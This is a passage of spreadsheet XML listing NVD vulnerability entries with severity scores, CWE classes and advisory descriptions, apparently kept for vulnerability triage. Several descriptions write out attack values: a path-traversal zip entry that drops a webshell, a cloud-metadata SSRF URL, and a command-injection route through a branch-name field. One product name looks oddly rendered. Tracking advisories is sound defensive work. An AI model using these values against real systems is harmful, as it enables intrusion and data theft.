        <v>0.001</v>
      </c>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr"/>
      <c r="Q547" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>There is a memory corruption vulnerability recently
discovered in NI LabVIEW that may result in information disclosure or arbitrary
code execution.  Successful exploitation requires an attacker to get a
user to open a specially crafted VI.  This vulnerability affects NI
LabVIEW 2026 Q3 (26.3.0) and prior versions.</t>
        </is>
      </c>
      <c r="S547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16234</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45221</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr"/>
      <c r="Q548" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R548"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S548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45221</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4644</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr"/>
      <c r="Q549" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in HTTP Connector in Google Cloud Integration Connectors versions prior to 2025-12-11 on Google Cloud Platform allows an authenticated user to escalate privileges and take over a Google Cloud Project using unauthorized service account attachment.
This vulnerability was patched on 11 December 2025, and no customer action is needed.</t>
        </is>
      </c>
      <c r="S549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4644</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58113</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr"/>
      <c r="Q550" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Teamcenter V2412 (All versions &lt; V2412.0013), Teamcenter V2506 (All versions &lt; V2506.0010), Teamcenter V2512 (All versions &lt; V2512.2607), Teamcenter V2606 (All versions &lt; V2606.2607). Affected applications do not properly encode user-supplied input reflected into HTML attribute contexts within the authentication redirect flow (/auth/ endpoint).
This could allow an unauthenticated remote attacker to inject arbitrary JavaScript into the browser of an authenticated user who loads a crafted URL, enabling the attacker to perform actions within the victim's Teamcenter session.</t>
        </is>
      </c>
      <c r="S550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61639</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr"/>
      <c r="Q551" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, POST /endpoints/db/restore.php calls ZipArchive::extractTo() without validating entry names for ../ sequences. Admin uploads crafted zip with entry logos/../../endpoints/shell.php to write webshell to webroot. Extension filter only applies to post-extraction logo copy step. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="S551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61639</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61640</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr"/>
      <c r="Q552" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, Admin-configured OIDC token_url and user_info_url in includes/oidc/handle_oidc_callback.php:18-49 are used directly in curl_init() with zero SSRF filtering. Unlike logo/webhook URLs which have validate_webhook_url_for_ssrf(), OIDC URLs bypass all protections. Admin sets URL to http://169.254.169.254/latest/meta-data/ for cloud metadata access or internal network pivoting. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="S552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61640</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64195</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr"/>
      <c r="Q553" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to lack of proper validation of user-supplied data. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="S553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64195</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64196</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr"/>
      <c r="Q554" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to improper validation of user-supplied data, resulting in a write past the end of an allocated heap. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="S554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64196</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64197</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr"/>
      <c r="Q555" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds write vulnerability in DASYLab due to improper validation of user-supplied data, resulting in a write past the end of an allocated data structure. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="S555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64197</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64198</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr"/>
      <c r="Q556" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read a few bytes past the end of an allocated heap buffer during file handling.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="S556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64198</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64200</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr"/>
      <c r="Q557" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read a past the end of an allocated heap buffer during string conversion.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="S557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64200</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K558" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr"/>
      <c r="Q558" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K559" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr"/>
      <c r="Q559" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67397</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr"/>
      <c r="Q560" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>Path traversal in Plesk 18.0.79.9 and earlier and 18.0.80 through 18.0.80.5 allows local users to execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="S560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67397</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K561" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr"/>
      <c r="Q561" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74860</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr"/>
      <c r="Q562" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="R562"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S562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75486</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr"/>
      <c r="Q563" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>Synk Sweater Comb before 3.8.8 contains a command injection vulnerability that allows an attacker who controls the .vervet.yaml configuration file to execute arbitrary OS commands by injecting malicious input into the linters.&lt;key&gt;.optic-ci.original branch name field. The expectGitBranch() function in src/lint.ts passes the unsanitized branch name directly into child_process.exec() via an unescaped template literal, enabling arbitrary command execution when the lint command is run against the repository.</t>
        </is>
      </c>
      <c r="S563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75486</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75993</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
